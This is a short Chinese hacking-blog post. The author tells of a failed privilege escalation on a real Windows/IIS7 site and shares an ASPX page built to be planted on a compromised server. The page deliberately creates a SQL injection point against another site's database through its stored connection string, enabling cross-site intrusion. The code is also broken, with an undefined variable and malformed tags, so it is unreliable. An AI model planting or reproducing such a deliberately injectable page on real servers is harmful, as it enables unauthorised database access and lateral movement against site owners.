利用aspx构造注射来跨站 - 网站安全 - 自学php

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。

其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。

代码量不多，自己写个拉倒了。烦死了。

作者：xxser www.anying.org 转载必须注明作者和网址

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head runat="server">

    <title>暗影aspx构造注射专用页面</title>

</head>

<body>

    <form id="form1" runat="server">

    <div>

     <script language=" c# " runat="server">

            

         void page_init(object sender, EventArgs e)

         {

             

             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

             

             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();

             conn.Open();

             

             

             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

             int x = command.ExecuteNonQuery();

             Response.Write(i+"\n");

             Response.Write(x);

             conn.Close();

         }

     

      </script>

    </div>

    </form>

</body>

</ html > 

查看更多关于利用aspx构造注射来跨站 - 网站安全 - 自学php的详细内容...